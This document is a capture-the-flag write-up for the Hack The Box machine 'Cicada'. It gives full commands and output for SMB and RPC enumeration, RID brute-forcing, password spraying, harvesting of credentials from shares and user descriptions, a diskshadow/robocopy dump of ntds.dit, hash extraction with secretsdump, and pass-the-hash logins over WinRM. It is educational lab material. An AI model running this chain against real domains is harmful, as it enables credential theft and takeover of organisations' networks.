HTB - Cicada
Enumeration
Nmap Scan
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nmap -F $ip -Pn
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
5985/tcp open wsman
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
389/tcp open ldap syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
593/tcp open http-rpc-epmap syn-ack
636/tcp open ldapssl syn-ack
3268/tcp open globalcatLDAP syn-ack
3269/tcp open globalcatLDAPssl syn-ack
5985/tcp open wsman syn-ack
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ sudo nmap -sU -p- --min-rate 10000 -oN Nmap/udp
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Active Directory LDAP (Domain: cicada.htb0)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Active Directory LDAP (Domain: cicada.htb0)
3268/tcp open ldap Active Directory LDAP (Domain: cicada.htb0)
3269/tcp open ssl/ldap Active Directory LDAP (Domain: cicada.htb0)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)* Open ports: 53,88,135,139,389,445,464,593,636,3268,3269,5985
* UDP open ports: 53,88,123,389
* Services: DNS - KERBEROS - RPC - SMB - winRM - ldap
* Important notes: Domain: cicada.htb - commonName=CICADA-DC.cicada.htb┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ sudo sh -c "echo '$ip CICADA-DC cicada.htb CICADA-DC.cicada.htb' >> /etc/hosts"
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ tail -n 1 /etc/hosts
10.10.11.35 CICADA-DC cicada.htb CICADA-DC.cicada.htbDNS Enumeration
Zone transfer failed
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ dig axfr cicada.htb @$ip
; <<>> DiG 9.20.1-1-Debian <<>> axfr cicada.htb @10.10.11.35
;; global options: +cmd
; Transfer failed.RPC Enumeration
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ rpcclient -U '%' $ip
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIEDSMB Enumeration
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ smbclient -N -L //$ip
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nxc smb $ip -u '' -p '' --shares
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\:
SMB 10.10.11.35 445 CICADA-DC [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nxc smb $ip -u 'guest' -p '' --shares
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL Logon server share I then used spider_plus module from nxc to crawl the shares and list all the files inside. I found Notice from HR.txt that could be interesting.
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nxc smb $ip -u 'guest' -p '' -M spider_plus
{
"HR": {
"Notice from HR.txt": {
"atime_epoch": "2024-08-28 13:31:48",
"ctime_epoch": "2024-03-14 08:29:03",
"mtime_epoch": "2024-08-28 13:31:48",
"size": "1.24 KB"
}
}
}Using smbclient from impacket, I connected to the share and downloaded all the files inside by mget * command
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ impacket-smbclient cicada.htb/guest:''@$ip
# shares
ADMIN$
C$
DEV
HR
IPC$
NETLOGON
SYSVOL
# use HR
# mget *
[*] Downloading Notice from HR.txt
# exitInitial Access
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ cat Notice\ from\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada CorpAfter reading the file, I got a password that can be sprayed to domain users. Then, I enumerated the domain users by bruting rid (Relative Identifier) technique
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nxc smb $ip -u 'guest' -p '' --rid-brute
..snip..
SMB 10.10.11.35 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.10.11.35 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.10.11.35 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)With the list of usernames, I could attempt the password I got against each one
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ cat users.list
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nxc smb $ip -u users.list -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.10.11.35 445 CICADA-DC [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE The password only worked for michael.wrightson. I did my next move by firing up ldapdomaindump for quick users and groups mapping
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Cicada]
└──╼ $bloodhound-python -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -ns 10.10.11.35 -d cicada.htb
INFO: Found AD domain: cicada.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Found 9 users
INFO: Connecting to LDAP server: cicada-dc.cicada.htb
INFO: Found 54 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: CICADA-DC.cicada.htb
INFO: Done in 00M 25S
┌──(kali㉿kali)-[~/…/platform/machines/Cicada/ldapdomaindump]
└─$ ldapdomaindump ldap://$ip -u 'cicada\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finishedLateral Movement
Domain Users info
From the users' info page, I got the following:
emily.oscars=> Member of (Remote Management Users, Backup Operators)david.orelious=>password:'aRt$Lp#7t*VQ!3'
With the password of david user, I will check share access again and it has READ access on most of the shares.
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nxc smb $ip -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV READ
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share Using spider_plus again, I found Backup_script.ps1
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ nxc smb $ip -u david.orelious -p 'aRt$Lp#7t*VQ!3' -M spider_plus
..snip..
{
"DEV": {
"Backup_script.ps1": {
"atime_epoch": "2024-08-28 13:28:22",
"ctime_epoch": "2024-03-14 08:31:38",
"mtime_epoch": "2024-08-28 13:28:22",
"size": "601 B"
}Download the file to examine it
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ impacket-smbclient cicada.htb/'david.orelious':'aRt$Lp#7t*VQ!3'@$ip
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Type help for list of commands
# use DEV
# mget *
[*] Downloading Backup_script.ps1From the file below, It's a backup script file used to backup SMB files using emily credentials
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#Mxxxxxxxx" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"As we saw previously, emily is a member of Remote Management User, So she can access the box using winRM
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ evil-winrm -i $ip -u emily.oscars -p 'Q!3@Lp#Mxxxxxxxx'
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> cat user.txt
1933e43bb4bcd65536axxxxxxxxxxxxxxxxxUser Flag: 1933e43bb4bcd65536axxxxxxxxxxxxxxxxx
Privilege Escalation
Emily is a member of privileged group Backup Operator, So she can backup files from the DC. In our case, the most interesting files are NTDS, SYSTEM, SAM registry hives
NTDS: The database of the domain controller containing all objects' credentialsSYSTEM: Registry key that contains decryption keySAM: The database of local system accounts
The principal of this attack is simple as we abuse Backup privileges to create shadow copy of specific file (NTDS.DIT in our case) and extract the domain secrets from it
I created a .vss file containing instruction for diskshadow utility to backup NTDS
more C:\Users\Public\diskshadowscript.txt
set context persistent nowriters
set metadata c:\windows\temp\file.cab
set verbose on
begin backup
add volume c: alias mydrive
create
expose %mydrive% p:
end backupThen execute the tool with the following command
diskshadow.exe /s C:\programdata\shadow.vssIf you face error when running
diskshadow, try to rununix2doscommand to convert the file to windows formatting
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Cicada]
└──╼ $unix2dos shadow.vss
unix2dos: converting file shadow.vss to DOS format...Copy the ntds.dit to working directory and download it using evil-winrm
robocopy /b P:\Windows\ntds\ C:\programdata ntds.ditBackup SYSTEM registry hive
*Evil-WinRM* PS C:\programdata> reg save HKLM\SYSTEM system.save
The operation completed successfully.After downloading the two files, I used secretsdump.py to extract administrator's hash
┌──(kali㉿kali)-[~/HackThebox/platform/machines/Cicada]
└─$ impacket-secretsdump -system system.save -ntds ntds.dit LOCAL | grep -i administrator
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0eaxxxxxxxxxxxxxx:::Access the DC and get the root flag
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Cicada]
└──╼ $evil-winrm -i 10.10.11.35 -u administrator -H 2b87e7c93a3e8a0eaxxxxxxxxxxxxxx
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
b53cd8bd68d39d7eb1xxxxxxxxxxxxxxRoot flag: b53cd8bd68d39d7eb1xxxxxxxxxxxxxx
Shortcut
I can read the root flag with backup privileges using robocopy :)
*Evil-WinRM* PS C:\programdata> robocopy /b C:\Users\Administrator\Desktop\ C:\programdata root.txt
*Evil-WinRM* PS C:\programdata> cat root.txt
b53cd8bd68d39d7eb1c4xxxxxxxxxxxxxxxLast updated